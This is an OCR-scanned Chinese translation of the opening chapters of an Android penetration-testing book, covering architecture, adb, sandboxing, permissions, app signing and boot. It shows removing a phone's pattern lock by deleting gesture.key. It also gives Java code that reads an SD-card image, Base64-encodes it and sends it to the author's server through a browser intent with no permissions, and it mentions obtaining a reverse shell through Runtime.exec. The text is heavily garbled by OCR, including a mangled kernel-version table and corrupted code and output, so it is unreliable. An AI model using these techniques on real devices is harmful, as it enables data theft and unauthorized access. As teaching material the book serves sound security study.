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第 一 章 Android 安全 入 门 


作者 : Aditya Gupta 
译 者 : 飞龙 
It : CC BY-NC-SA 4.0 


Android 是 当今 最 流行 的 智能 手机 操作 系统 之 一 。 随 着 人 气 的 增加 ， 它 存在 很 多 安全 风险 ， 
这 些 风险 不 可 避免 地 被 引入 到 应 用 程序 中 ， 使 得 用 户 本 身受 到 威胁 。 我 们 将 在 本 书 中 以 方法 
论 和 循序 渐进 的 方式 来 讨论 Android 应 用 程序 安全 性 和 渗透 测试 的 各 个 方面 。 


本 章 的 目标 是 为 Android 安全 打下 基础 ， 以 便 在 以 后 的 章节 中 使 用 。 


1.1 Android 简介 


自从 Android 被 谷歌 收购 (2005 F) ， 人 谷歌 已 经 完成 了 整个 开发 ， 在 过 去 的 9 年 里 ， 尤 其 是 
在 安全 方面 ， 有 很 多 变化 。 现在 ， 它 是 世界 上 最 广泛 使 用 的 智能 手机 平台 ， 特 别 是 由 于 不 同 

的 手机 制造 商 ， 如 LG， 三 星 ， 索 尼 和 HTC 的 支持 。 Android 的 后 续 版 本 中 引入 了 许多 新 概 

念 ， 例 如 Google Bouncer 和 Google App Verifier。 我 们 将 在 本 章 逐 一 介绍 它们 。 


如 果 我 们 看 看 Android 的 架构 ， 如 下 图 所 示 ， 我 们 将 看 到 它 被 分 为 四 个 不 同 的 层 。 在 它 的 底 
部 是 Linux 内 核 ， 它 已 被 修改 来 在 移动 环境 中 获得 更 好 的 性 能 。Linux 内 核 还 必须 与 所 有 硬件 
组 件 交互 ， 因 此 也 包含 大 多 数 硬 件 驱 动 程序 。 此 外 ， 它 负责 Android 中 存在 的 大 多 数 安全 功 
能 。 由 于 Android 基于 Linux 平台 ， 它 还 使 开发 人 员 多 于 将 Android 移植 到 其 他 平台 和 和 架 
构 。 Android 还 提供 了 一 个 硬件 抽象 层 ， 供 开发 人 员 在 Android 平台 栈 和 他 们 想 要 移植 的 硬 
件 之 间 创 建 软件 钓 子 。 


在 Linux 内 核 之 上 是 一 个 层级 ， 包 含 一 些 最 重要 和 有 用 的 库 ， 如 下 所 示 : 


Surface Manager : 管理 窗口 和 屏幕 媒体 框架 : 这 允许 使 用 各 种 类 型 的 编 解 码 器 来 播放 和 记 
录 不 同 的 媒体 SQLite : 这 是 一 个 较 轻 的 SQL 版 本 ， 用 于 数据 库 管理 WebKit : 这 是 浏览 器 泻 
R45] OpenGL : 用 于 在 屏幕 上 正确 显示 2D 和 3D 内 容 


以 下 是 来 自 Android 开发 人 员 网 站 的 Android 架构 的 图 形 表示 : 
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Android 中 的 库 是 用 C 和 C++ 编写 的 ， 其 中 大 多 数 是 从 Linux 移植 的 。 4 Linux 相 比 ， 
Android 中 的 一 个 主要 区 别 是 ， 在 这 里 没有 libe È ° CAT Linux 中 的 大 多 数 任 务 。 HR? 
Android 有 自己 的 称 为 bionic 的 库 ， 我 们 可 以 认为 它 是 一 个 剥离 和 修改 后 的 ， 用 于 Android 
的 libc 版 本 。 


在 同一 层级 ， 还 有 来 自 Android 运行 时 -- Dalvik 虚拟 机 和 核心 库 的 组 件 。 我 们 将 在 本 书 的 下 
一 部 分 中 讨论 关于 Dalvik 虚拟 机 的 很 多 内 容 。 


在 这 个 层 之 上 ， 有 应 用 程序 框架 层 ， 它 支持 应 用 程序 执行 不 同类 型 的 任务 。 


此 外 ， 开 发 人 员 创 建 的 大 多 数 应 用 程序 只 与 第 一 层 和 最 顶层 的 应 用 程序 交互 。 该 架构 以 一 种 
方式 设计 ， 在 每 个 时 间 上 点， 底层 都 支持 上 面 的 层级 。 


早期 版 本 的 Android (<4.0) AT Linux 内 核 2.6.x， 而 较 新 版 本 基于 内 核 3.x. 不 同 的 
Android 版 本 和 他 们 使 用 的 Linux 内 核 的 列表 规定 如 下 : 




















Android 1,4 | Linux Kernel 2.6.27 


| Android 1.6 Linux Kernel 2.46.29 











| Android 2.0/2.1 | Linux Kernel 2.6.29 
| Android 2.2 Linux Kernel 2.6.32 
Android 2.7. | Linux Kernel 2.6.35 
| Android 3.= | Linux Kernel 2.6.36 
Android 4.«” | Linux Kernel 3.0.1 








| Android 4.1/4.2 Linux Kernel 3.0.31 


Android 中 的 所 有 应 用 程序 都 在 虚拟 环境 下 运行 ， 这 称 为 Dalvik 虚拟 机 (DVM) 。 这 里 需要 
注意 的 一 点 是 ， 从 Android 4.4 RAAB > BAAD AA Android 运行 时 (ART) ， 
用 户 可 以 在 DVM 和 ART 运行 时 环境 之 间 自 由 切换 。 


然而 ， 对 于 这 本 书 ， 我 们 将 只 关注 Dalvik 虚拟 机 实现 。 它 类 似 于 Java 虚拟 机 (JVM) >? R 
了 基于 寄存 器 的 特性 ， 而 不 是 基于 堆栈 的 特性 。 因 此 ， 运 行 的 每 个 应 用 程序 都 将 在 自己 的 
Dalvik 虚拟 机 实例 下 运行 。 因此， 如 果 我 们 运行 三 个 不 同 的 应 用 程序 ， 将 有 三 个 不 同 的 虚拟 
实例 。 现在 ， 这 里 的 重点 是 ， 即 使 它 为 应 用 程 原创 建 一 个 庶 拟 环境 来 运行 ， 它 不 应 该 与 安全 
容器 或 安全 环境 混 消 。 DVM 的 主要 焦点 是 与 性 能 相关 ， 而 不 是 与 安全 性 相关 。 


步 查 
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Dalvik 虚拟 机 执行 一 个 名 为 ,dex 或 Dalvik 可 执行 文件 的 文件 格式 。 我 们 将 
看 .dex 文件 格式 ， 并 将 在 下 面 的 章节 中 进行 分 析 。 现在 让 我 们 继续 与 adb 
深入 地 分 析 Android 设备 及 其 体系 结构 。 


saa 
进行 


1.2 深入 了 解 Android 


如 果 你 有 Android 设备 或 正在 运行 Android 模 拟 器 ， 则 可 以 使 用 Android SDK 本 身 提供 的 工具 
( 称 为 adb) 。 我 们 将 在 第 二 章 详细 讨论 adb。 现 在， 我 们 将 只 设置 SDK， 我 们 已 经 准备 好 
T 


一 旦 设备 通过 USB 连接 ， 我 们 可 以 在 我 们 的 终端 中 输入 adb > 304% sb TA EEA BAY EA 
列表 。 请 确保 你 已 在 设备 设置 中 局 用 了 USB 调试 功能 。 


$ adb devices 
List of devices attached 
emulator -5554 device 


提示 
下 载 示例 代码 


你 可 以 从 http://www.packtpub.com 下 载 你 从 帐户 中 购买 的 所 有 Packt 图 书 的 示例 代码 文 
件 。 如 果 你 在 其 他 地 方 购买 此 书 ， 则 可 vA tz le] http: //www.packtpub.com/support 并 注册 
以 将 文件 直接 发 送 给 你 。 


现在 ， 如 我 们 之 前 所 见 ，Android 是 基于 Linux 内 核 的 ， 所 以 大 多 数 Linux 命令 在 Android 上 
也 可 以 通过 adb shell 完美 运行 。 adb shell A shell 直接 交互 ， 你 可 以 在 其 中 
执行 命令 和 执行 操作 以 及 分 析 设 备 中 存在 的 信息 。 为 了 执行 shell， 只 需要 键入 以 下 命令 


adb shell. 


一 旦 我 们 在 shell 中 ， 我 们 可 以 运行 ps 为 了 列 出 正在 运行 的 进程 : 


PIO PPID WSIZE R55 WCHAN PC NAME 
六 468 220 cO@?rdcO OOB08cc 5 imit 
: cOQ9815c O0000008 $ kthreadd 
cr oeec GO000000 5 ksoftirgd/@ 
cOGoeac4 8GN80080 5 wotchdog’d 
caica GOO80000 5 events/B 


19682 1384 135670 15020 fFFFFFFF FFFFOS2O 5 sec. android, providers.dra 
19770 1304 146072 23376 fFfFFFFF afd@cSbc 5 whatsapp 
19788 1304 138720 20488 FFFFFFFF ofdůc5bc 5 cos.wssyncmldm 
19807 1304 135888 16748 fff ff afdūc5bg 5 

$ 


19816 1304 157876 23580 ffffffff ofdgcSbec 


m.sec.android.widgetapp.dualclock 





.google.android.apps.maps;GoogleLocat 


如 你 所 见 ， ps 将 列 出 当前 在 Android 系统 中 运行 的 所 有 进程 。 如 果 仔 细 看 ， 第 一 列 制定 了 
用 户 名 。 在 这 里 我 们 可 以 看 到 各 种 用 户 名 ， 如 system ， root ， radio lp 以 app_ # 
头 的 用 户 名 。 正如 你 可 能 已 经 猜 到 的 ， 以 system 名 称 运 行 的 进程 由 系统 拥有 ， root 作为 根 
进程 运行 ， radio 是 与 电话 和 无 线 电 相关 的 进程 ， app 进程 是 用 户 已 下 载 的 所 有 应 用 程序 ， 

装 在 他 们 的 设备 上 并 且 当 前 正在 运行 。 因此， 就 像 在 Linux iene 当前 登录 到 系统 
的 唯一 用 户 一 样 ， 在 Android 中 ， 用 户 标 识 了 在 自己 的 环境 中 运行 的 应 用 /进程 。 


所 以 ，Android 安全 模型 的 核心 是 Linux 特权 分 离 。 每 次 在 Android 设备 中 尼 动 新 应 用 程序 
时 ， 都 会 为 其 分 配 唯 一 的 用 户 ID (UID) ， 该 用 户 ID 将 之 后 会 属于 某 些 其 他 预定 义 组 。 


与 Linux 类 似 ， 用 作 命 令 的 所 有 二 进 制 文件 都 位 于 /system/bin 和 /system /xbin 。 此 外 ， 我 
们 从 Play 商店 或 任何 其 他 来 源 安装 的 应 用 程序 数据 将 位 于 /data/data ， 而 其 原始 安装 文件 
(BP apk ) 将 存储 在 /data/app 。 此 外 ， 还 有 一 些 应 用 程序 需要 从 Play 商店 购买 ， 而 不 是 
只 是 免费 下 载 这 些 应 用 程序 将 存储 在 /data/app-private/ ° 


Android 安装 包 (APK) 是 Android 应 用 程序 的 默认 扩展 名 ， 它 只 是 一 个 归档 文件 ， 包 含 应 用 
程序 的 所 有 必需 文件 和 文件 夹 。 我 们 在 后 面 的 草 节 中 将 继续 对 apk 文件 进行 遂 向 工程 。 


现在 ， 让 我 们 访问 /data/data ， 看 看 里 面 有 什么 。 这 里 需要 注意 的 一 点 是 ， 为 了 在 盟 实 设备 
上 实现 ， 设 备 需要 root 并 且 必 须 处 于 su RH: 


# cd /data/data 

# 1s 
com.aditya.facebookapp 
com.aditya.spinnermenu 
com.aditya.zeropermission 
com.afe.socketapp 
com.android.backupconfirm 
com.android. browser 
com.android.calculator2 
com.android.calendar 
com.android.camera 
com.android.certinstaller 
com.android.classic 
com.android.contacts 
com.android.customlocale2 


所 以 ， 我 们 可 以 在 这 里 看 到 ， 例 如 ， com.aditya.facebookapp ， 是 单独 的 应 用 程序 文件 夹 。 
现在 ， 你 可 能 会 想 知道 为 什么 它 是 用 点 分 隔 的 单词 风格 ， 而 不 是 第 见 的 文件 夹 名 称 ， 

如 FacebookApp 或 CameraApp ° 因此 ， 这 些 文件 夹 名 称 指定 各 个 应 用 程序 的 软件 色 名 称 。 软 
件 包 名 称 是 应 用 程序 在 Play 商店 和 设备 上 标识 的 唯一 标识 符 。 例 如 ， 可 能 存在 具有 相同 名 称 
的 多 个 相机 应 用 或 计算 器 应 用 。 因 此， 为 了 唯一 地 标识 不 同 的 应 用 ， 使 用 包 名 称 约 定 而 不 是 
ip PLZ FG AR © 


如 果 我 们 进入 任何 应 用 程序 文件 夹 ， 我 们 会 看 到 不 同 的 子 文件 夹 ， 例 如 文件 ( files) ， 数 
据 库 ( databases ) 和 缓存 ( cache ) ， 稍 后 我 们 将 在 第 3 ih | Fe HT Android 应 用 程 
序 "中 查看 。 


shell@android:/data/data/de.trier.infsec.koch.droidsheep # ls 
cache 

databases 

files 

lib 

Sshell@android:/data/data/de.trier.infsec.koch.droidsheep # 


这 里 需要 注意 的 一 个 重要 的 事情 是 ， 如 果 手 机 已 经 root， 我 们 可 以 修改 文件 系统 中 的 任何 文 
件 。 对 设备 获取 root 意味 着 我 们 可 以 完全 访问 和 控制 整个 设备 ， 这 意味 着 我 们 可 以 看 到 以 及 
修改 任何 我 们 想 要 的 文件 。 

最 常见 的 安全 保护 之 一 是 大 多 数 人 都 想到 的 是 模式 锁定 或 pin 锁 ， 它 默认 存在 于 所 有 Android 
手机 。 你 可 以 通过 访问 Settings | Security | Screen Lock 来 配置 日 己 的 模式 。 

一 旦 我 们 设置 了 黎 码 或 模式 锁定 ， 我 们 现在 将 继续 ， 将 手机 与 USB 连接 到 我 们 的 系统 。 现 
在 ， 冤 码 锁 的 冤 钥 或 模式 锁 的 模式 数据 以 名 称 password.key 或 gesture.key 存储 

在 /data/system ° 注意 ， 如 果 设 备 被 锁定 ， 并 且 USB 调试 被 打开 ， 你 需要 一 个 自 定 义 引 导 
加 载 程序 来 打开 USB 调试 。 整个 过 程 超出 了 本 书 的 范围 。 要 了 解 有 关 Android 的 更 多 信 
息 ， 请 参阅 Thomas Cannon Digging 的 Defcon 演示 。 

因为 破解 均码 /模式 将 更 加 艰难 ， 并 且 需 要 暴力 〈 我 们 将 看 到 如 何 解 密实 际 数据 ) ， 我 们 将 简 
单 地 继续 并 删除 该 文件 ， 这 将 从 我 们 手机 中 删除 模式 保护 : 


shell@android:/data # cd /data/system 
shell@android:/data/system # rm gesture.key 


所 以 ， 我 们 可 以 看 到 ， 一 旦 手机 被 root ， 几 乎 任何 东西 都 可 以 只 用 手机 、 一 根 USB 电 绕 和 一 
个 系统 来 完成 。 我 们 将 在 本 书 的 后 续 草 节 中 更 多 地 了 解 基于 USB 的 利用 。 


1.3 沙 相 和 权限 模型 


为 了 理解 Android 沙 箱 ， 让 我 们 举 一 个 例子 ， 如 下 图 : 
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如 前 图 所 示 和 前 面 所 讨论 的 ，Android 中 的 每 个 应 用 程序 都 在 其 自己 的 Dalvik 虚拟 机 实例 中 
运行 。 这 就 是 为 什么 ， 无 论 何 时 任何 应 用 程序 在 我 们 的 设备 中 崩 演 ， 它 只 是 显示 强制 关闭 或 
等 待 选项 ， 但 其 他 应 用 程序 继续 顺利 运行 。 此 外 ， 由 于 每 个 应 用 程序 都 在 其 自己 的 实例 中 运 
行 ， 因 此 除非 内 容 提 供 者 另 有 规定 ， 否 则 将 无 法 访问 其 他 应 用 程序 的 数据 。 


Android 使 用 细 粒 度 的 权限 模型 ， 这 需要 应 用 程序 在 编译 最 终 应 用 程序 包 之 前 预定 义 权 限 。 


你 必须 注意 到 ， 每 次 从 Play 商店 或 任何 其 他 来 源 下 载 应 用 程序 时 ， 它 会 在 安装 过 程 中 显示 一 
个 权限 屏幕 ， 它 类 似 于 以 下 屏幕 截图 : 


on (lS @ 9:37 am 


Application info 


Permissions 





此 权限 屏幕 显示 应 用 程序 可 以 通过 手机 执行 的 所 有 任务 的 列表 ， 例 如 发 送 短信 ， 访 问 互 联网 
和 访问 摄像 头 。 请求 多 于 所 需 的 权限 使 应 用 程序 成 为 恶意 软件 作者 的 更 具 吸 引力 的 目标 。 


Android 应 用 程序 开发 人 员 必须 在 开发 应 用 程序 时 在 名 为 AndroidManifest.xml 的 文件 中 指定 

所 有 这 些 权 限 。 此 文件 包含 各 种 应 用 程序 相关 信息 的 列表 ， 例 如 运行 程序 所 需 的 最 低 

Android 版 本 ， 程 序 包 名 称 ， 活 动 列 表 (应 用 程序 可 见 的 应 用 程序 中 的 界面 ) ， 服 务 (应 用 程 
序 的 后 台 进 程 ) ， 和 和 权限。 如 果 应 用 程序 开发 人 员 未 能 在 AndroidManifest.xml 文件 中 指定 


权限 ， 并 仍 在 应 用 程序 中 使 用 它 ， 则 应 用 程序 将 户 溃 ， 并 在 用 户 运行 它 时 显示 强制 关闭 消 
A O 


Mm 


一 个 正常 的 AndroidManifest.xml 文件 看 起 来 像 下 面 的 截图 所 示 。 在 这 里 ， 你 可 以 使 
用 <uses-permission> 标记 和 其 他 标记 查看 所 需 的 不 同 权限 : 


<?xml version="1.@" encoding="utf-&"?> 

manifest xmins:android= "http: ./schemas.androtd. com/apk/res/android" 
package= ‘com. adi tya. something” 
android: versionCode="1" 
android: versionName="1.@" > 


<uses-permission android:name="androtd.permisston.ACCESS_WIFI_STATE” / 
<UsSé5-Sdk 

android: minSdkVersion= "8" 

android: targetSdkVersion="17" /> 





如 前 所 述 ， 所 有 Android 应 用 程序 在 安装 后 首次 启动 时 都 会 分 配 一 个 唯一 的 UID。 县 有 给 定 
UID 的 所 有 用 户 都 属于 特定 组 ， 具 体 取 决 于 他 们 请 求 的 权限 。 例 如 ， 一 个 仅 请 求 Internet 权 
限 的 应 用 程序 将 属于 inet 组 ， 因 为 Android 中 的 Internet 权限 位 于 inet 组 下 。 


(在 这 种 情况 下 的 应 用 程序 ) 可 以 属于 多 个 组 ， 具 体 取 决 于 他 们 请 求 的 权限 。 或 者 换 印 
话说 ， 每 个 用 户 可 以 属于 多 个 组 ， 并 且 每 个 组 可 以 具有 多 个 用 户 。 这 些 组 具有 由 组 
ID (GID) 定义 的 唯一 名 称 。 然而 ， 开 发 人 员 可 以 明确 地 指定 其 他 应 用 程序 在 与 第 一 个 相同 
的 UID 下 运行 。 在 我 们 的 设备 中 ， 其 中 的 组 和 权限 在 文件 platform.xml 中 指定 ， 它 位 


sie /system/etc/permissions/ 


shell@grouper:/system/etc/permissions $ cat platform. xml 
<permissions> 


<!-- The following tags are associating low-level group IDs with 
permission names. By specifying such a mapping, you are saying 
that any application process granted the given permission will 
also be running with the given group ID attached to its process, 
so it can perform any filesystem (read, write, execute) operations 
allowed for that group. --> 


<permission name="android.permission.BLUETOOTH" > 
<group gid="net_bt" /> 

</permission> 

<permission name="android.permission. INTERNET" > 
<group gid="inet" /> 

</permission> 

<permission name="android.permission.CAMERA" > 
<group gid="camera" /> 

</permission> 


Siege [Some of the data has been stripped from here in order to shorten the output an 
d make it readable] 


</permissions> 


此 外 ， 这 清除 了 对 在 Android 设备 中 运行 的 本 地 应 用 程序 的 怀疑 。 由 于 本 地 应 用 程序 直接 与 
WERZA?’ MRE Dalvik 虚拟 机 下 运行 ， 因 此 它 不 会 以 任何 方式 影响 整体 安全 模型 。 


现在 ， 就 像 我 们 在 前 面部 分 看 到 的 ， 应 用 程序 将 其 数据 存储 

在 location/data/data/[package name] ° 现在 ， 存储 应 Jt] 42. Fe BE 的 所 有 文件 夹 也 具 LIL 有 相同 
的 用 户 ID ， ee Android 安全 模型 的 基础 。 根据 UID 和 文件 权限 ， 它 将 限制 来 自 具有 不 同 
UID 的 其 他 应 用 程序 对 它 的 访问 和 修改 。 


在 下 面 的 代码 示例 中 ， ret 包含 以 Base64 格式 编码 存储 在 的 SD 卡 中 的 图 像 ， 现 在 正在 使 
用 浏览 器 调用 来 上 传 到 attify.com 网 站 。 目的 只 是 找到 一 种 方式 来 在 两 个 不 同 的 Android 对 
则 之 间 进 行 通 信 。 

我 们 将 首先 创建 一 个 对 象 来 存储 图 像 ， 在 Base64 中 编码 ， 最 后 将 其 存储 在 一 个 字符 囊 


中 imageString 


final File file = new File("/mnt/sdcard/profile.jpg"); 
Uri uri = Uri.fromFile(file); 
ContentResolver cr = getContentResolver(); 
Bitmap bMap=nul1; 
try i 

InputStream is = cr.openInputStream(uri); 

bMap = BitmapFactory.decodeStream(is); 

if (is != null) { 

is.close(); 


} 
} catch (Exception e) { 
Log.e("Error reading file", e.toString()); 


ByteArrayOutputStream baos = new ByteArrayOutputStream(); 
bMap.compress(Bitmap.CompressFormat.JPEG, 100, baos); 

byte[] b = baos.toByteArray(); 

String imageString = Base64.encodeToString(b,Base64.DEFAULT); 


> 我 们 将 启动 浏览 器 将 数据 发 送 到 我 们 的 服务 器 ， 我 们 有 一 个 ,php 文件 侦 听 传 入 的 数 
i 


startActivity(new Intent(Intent.ACTION_VIEW, Uri.parse("http://attify.com/up.php?u="+im 
ageString)))/; 


我 们 还 可 以 执行 open ， 这 里 需要 注意 的 一 点 
是 shell 应 该 在 应 用 程序 的 用 户 下 运 


Sorina) ‘str. = Wea er aes rests ‘7command to be executed is stored ir 
process = Runtime.getRuntime(). exec(str); 


这 是 一 个 有 趣 的 现象 ， 因 为 攻击 者 可 以 获得 一 个 反 向 shell (这 是 一 个 从 设备 到 系统 的 双向 连 
接 ， 可 以 用 于 执行 命令 ) ， 而 不 需要 任何 类 型 的 权限 。 


1.424 24 


应 用 程序 签名 是 Android 的 独特 特性 之 一 ， 由 于 其 开放 性 和 开发 人 员 社 区 ， 它 取得 了 成 功 。 
Play 商店 中 有 超过 一 百 万 个 应 用 。 在 Android 中 ， 任 何人 都 可 以 通过 下 载 Android SDK 创建 
Android 应 用 ， 然 后 将 其 发 布 到 Play 商店 。 通 第 有 两 种 类 型 的 证 书签 名 机 制 。 一 个 是 由 管理 
证 书 颁 发 机 构 (CA) 签名 的 ， 另 一 个 是 自 签名 证 书 。 没有 中 间 证 书 颁发 机 构 (CA) ， 而 开 
发 人 员 可 以 创建 自己 的 证 书 并 为 应 用 程序 签名 。 


在 Apple 的 iOS 应 用 程序 模型 中 可 以 看 到 CA 签名 ， 其 中 开发 者 上 传 到 App Store 的 每 个 应 
用 程序 都 经 过 验证 ， 然 后 由 Apple 的 证 书签 名 。 一旦 下 载 到 设备 ， 设 备 将 验证 应 用 程序 是 否 
由 Apple 的 CA 签名 ， 然 后 才 允 许 应 用 程序 运行 。 


但 是 ， 在 Android 中 是 相反 的 。 没有 证 书 颁 发 机 构 ; 而 是 开发 人 员 的 自 创建 证 书 可 以 签署 应 用 
程序 。 应 用 程序 上 传 完 成 后 ， 会 由 Google Bouncer 进行 验证 ， 这 是 一 个 虚拟 环境 ， 用 于 检 
查 应 用 程序 是 否 是 恶意 或 合法 的 。 检查 完成 后 ， 应 用 就 会 显示 在 Play 商店 中 。 在 这 种 情况 
下 ，Google 不 会 对 该 应 用 程序 进行 签名 。 开发 人 员 可 以 使 用 Android SDK 附带 的 工具 ( 称 
为 keytool ) 创建 自己 的 证 书 ， 或 者 使 用 Eclipse 的 GUI 创建 证 书 。 


因此 ， 在 Android 中 ， 一 旦 开发 人 员 使 用 他 创建 的 证 书签 名 了 应 用 程序 ， 他 需要 将 证 书 的 密 
钥 保 存在 安全 的 位 置 ， 以 防止 其 他 人 窃取 他 的 密 钥 并 使 用 开发 人 员 的 证 书签 署 其 他 应 用 程序 


O 


如 果 我 们 有 一 个 Android 应 用 程序 ( .apk ) 文件 ， 我 们 可 以 检查 应 用 程序 的 签名 ， 并 找到 使 
用 称 为 jarsigner 的 工具 签署 应 用 程序 的 人 ， 这 个 工具 是 Android SDK 自 带 的 : 


$ jarsigner -verify -certs -verbose testing.apk 


以 下 是 在 应 用 程序 上 运行 上 述 命令 并 获取 签名 的 信息 的 屏幕 截图 : 


二 ta E ie i 
jarsigner -verify -certs -verbose testing.apk 


5m 652 Sat Nov 16 66:23:16 GMT+05:30 2013 res/layout/activity_main. xml 


A.5989, CNeAditya Gupta, OU=Attify, OeAttify India, L=Mumbai, ST=Maharastra, C=IN 
[certificate is valid from 11/16/13 6:23 AM to 11/16/38 6:23 AM] 





此 外 ， 解 压缩 apk 文件 后 ， 可 以 解析 META-INF 文件 夹 中 出 现 的 CERT.RSA 文件 的 ASCII A 
容 ， 以 获取 签名 ， 如 以 下 命令 所 示 : 


unzip testing.apk 

cd META-INF 

openssl pkcs7 -in CERT.RSA -print_certs -inform DER -out out.cer 
cat out.cer 


AAA H 


这 在 检测 和 分 析 未 知 的 Android .apk 示例 时 非常 有 用 。 因此 ， 我 们 可 以 使 用 它 获 得 签署 人 
以 及 其 他 详细 信息 。 


1.5 Android 后 动 流程 


在 Android 中 考虑 安全 性 时 最 重要 的 事情 之 一 是 Android 启动 过 程 。 整 个 引导 过 程 从 引导 加 
载 程序 开 始 ， 它 会 反 过 来 启动 init 过 程 - 第 一 个 用 户 级 进程 。 


所 以 ， 任 何 引 导 加 载 程序 的 变化 ， 或 者 如 果 我 们 加 载 另 一 个 ， 而 不 是 上 默认 存在 的 引导 加 载 程 
序 ， 我 们 实际 上 可 以 更 改 在 设备 上 加 载 的 内 容 。 引导 加 载 程 序 通 常 是 特定 于 供应 商 的 ， 每 个 
供应 商都 有 自己 的 修改 版 本 的 引导 加 载 程序 。 通常 ， 默 认 情 况 下 ， 此 功能 通过 锁定 引导 加 载 
程序 来 茶 用 ， 它 只 允许 供应 商 指 定 的 受信 任 内 核 在 设备 上 和 运行。 为 了 将 自己 的 ROM 刷 到 
Android 设备 ， 需 要 解锁 引导 加 载 程序 。 解锁 引导 加 载 程序 的 过 程 可 能 因 设 备 而 异 。 HT 
情况 下 ， 它 也 可 能 使 设备 的 保修 失效 。 


` 


VE. 


在 Nexus 7 中 ， 它 就 像 使 用 命令 行 中 的 fastboot 工具 一 样 简单 ， 如 下 所 示 : 


$ fastboot oem unlock 


在 其 他 设备 中 ， 可 能 需要 更 多 精力 。 我 们 看 看 如 何 创建 自己 的 Bootloader 并 在 本 书 的 后 续 章 


节 中 使 用 它 。 


回 到 启动 过 程 ， 在 引导 加 载 程序 启动 内 核 并 启 Ae A 元 运行 所 需 
的 一 些 重 要 目录 ， 例 如 /dev ， /sys 和 /proc ° 此 外 ， init 从 配置 

YE init.rc 和 init.[device-name].rc 中 获取 自己 的 配置 ， 在 某 些 情 vemos 同位 置 

的 .sh 文件 获取 上 自己 的 配置 


shell@androld:/ 
root root 


$ ls -L | grep ‘init’ 

102920 1970-01-01 

it.clrdex.sh 

-goldfish.rc 

root root 16758 1976-81-01 :3 init.rc 
root root 19144 1970-01-01 65:: it.semc.rec 
root root 3219 1970-01-01 it.usbmode. sh 

shell@android:/ $ E 


root root 958 1978-01-01 
/ foot root 2787 1970-01-01 





如 果 我 们 对 init.rc 文件 执行 cat ， 我 们 可 以 看 到 init 加 载 自身 时 使 用 的 所 有 规范 ， 如 下 
面 的 截图 所 示 : 
snell@android:/ # cat init.rc 
on early-init 
# Set init and its forked children's oom_adj. 
write /proc/1/oom_adj -16 
Start ueventd 


# create mountpoints 
mkdir /mnt @775 root system 


on init 
sysclktz ð 


loglevel 3 


# setup the global environment 


export 
export 
export 
export 
export 
export 
export 
export 


PATH /sbin:Zvendor/bin:/system/sbin:/system/bin:/s 


LD_LIBRARY_PATH /vendor/lib:/system/lib:/1lib: /usr 
ANDROID_BOOTLOGO 1 

ANDROID_ROOT /system 

ANDROID_ASSETS /system/app 

ANDROID_DATA /data 

ASEC_MOUNTPOINT /mnt/asec 

LOOP_MOUNTPOINT /mnt/obb 





init 进程 的 责任 是 启动 其 他 必需 的 组 件 ， 例 如 负责 ADB 通信 和 卷 守 护 程序 (vold) 的 adb 
守护 程序 (adbd) 。 


加 载 时 使 用 的 一 些 属 性 位 于 build.prop ， 它 位 于 location/system ° 当 你 在 Android 设备 上 
看 到 Android logo 时 ， 就 完成 了 init 进程 的 加 载 。 正如 我 们 在 下 面 的 截图 中 可 以 看 到 的 ， 
我 们 通过 检查 build. prop 文件 来 获取 设备 的 具体 信息 : 


shell@android:/system # cat build.prop 

##### Merging of the /util/data/semc_kernel_time_stamp.prop file ##### 
ro.build.date=Fri Oct 5 01:14:38 2012 

ro, build. date. utc=1349367278 

ro, build. user=Builduser 

ro.build.host=BuildHost 


##### Final patch of properties ##### 
»build.product=LT261 
»build.description=LT26i-user 4.0.4 6.1.A.2.55 yPd_zw test—-keys 


.product.brand=SEMC 

»product.name=LT2761_1257-6758 

\. Product.device=LT261 

»build. tags=release—-keys 

„build. fingerprint=SEMC/LT26i_1257-6758/L7T261:4.0.4/6.1.A.2.55/yPd_zv 


HHH eee ae Customized property values SPPP 


.5emc. version. cust=12757-6758 
‚Seme. version. cust_revision=R5G 


HHHHHSRRARAARHH EH CRRARAAHRER SRA ARARAAH RR ARR ARH ER ERA ARAARA EERE TA 


. config. ringtone=xperia. ogg 
.config.notification_sound=notification.ogg 
.config.alarm_alert=alarm.ogg 

.5emc. content.number=PA4 





一 旦 所 有 的 东西 被 加 载 ， init 最 后 会 加 载 一 个 称 为 Zygote 的 进程 ， 负 责 以 最 小 空间 加 载 
Dalvik 虚拟 机 和 共享 库 ， 来 加 快 整 个 进程 的 加 载 速度 。 此 外 ， 它 继续 监听 对 自己 的 新 调用 ， 
以 便 在 必要 时 启动 更 多 DVM。 这 是 当 你 在 设备 上 看 到 Android 开机 动画 时 的 情况 。 


一 旦 完全 启动 ，Zygote 派生 自己 并 启动 系统 ， 加 载 其 他 必要 的 Android 组 件 ， 如 活动 管理 

。 一 旦 完成 整个 引导 过 程 ， 系 统 发 送 BooT_coMPLETED 的 广播 ， 许 多 应 用 程序 可 能 使 用 称 为 
广播 接收 器 的 Android 应 用 程序 中 的 组 件 来 监听 。 当 我 们 在 第 3 章 “ 逆 向 和 审计 Android 应 用 
程 


Fe? ay HT Æ JE 意 软件 和 应 用 程序 时 ， 我 们 将 进 步 了 解 广播 接收 器 : 
总 结 


在 本 章 中 ， 我 们 为 学 习 Android 渗 透 测 试 建立 了 基础 。 我们 还 了 解 Android 的 内 部 结构 及 其 
安全 体系 结构 。 


在 接 下 来 的 草 节 中 ， 我 们 将 建立 一 个 Android 涂 透 测试 实验 室 ， 并 使 用 这 些 知识 执行 更 多 的 
技术 任务 ， 来 渗透 Android 设备 和 应 用 程序 。 我 们 还 将 了 解 有 关 ADB 的 更 多 信息 ， 并 使 用 它 
来 收集 和 分 析 设 备 中 的 信息 。 


第 二 章 准备 实验 环境 


作者 : Aditya Gupta 
译 者 : 飞龙 
协议 : CC BY-NC-SA 4.0 


在 上 一 章 中 ， 我 们 了 解 了 Android 安全 性 及 其 体系 结构 的 基础 知识 。 在 本 章 中 ， 我 们 将 了 解 
如 何 建立 Android 渗透 测试 实验 环境 ， 其 中 包括 下 载 和 配置 Android SDK 和 Eclipse。 我 们 
将 深入 了 解 ADB， 并 了 解 如 何 创建 和 配置 Android 虚拟 设备 (AVD) 。 


2.1 建立 开发 环境 


为 了 构建 Android 应 用 程序 或 创建 Android 虚拟 设备 ， 我 们 需要 配置 开发 环境 ， 以 便 运 行 
些 应 用 程序 。 因 此， 我 们 需要 做 的 第 一 件 事 是 下 载 Java 开发 工具 包 (JDK) ， 其 中 包括 
Java 运行 时 环境 (JRE) 
1. 为 了 下 载 JDK， 我 们 需要 访 
站 http://www.oracle.com/technetwork/java/javase/downloads/index.html ? 并 根据 我 们 所 


在 的 平台 下 载 JDK 7 ° 


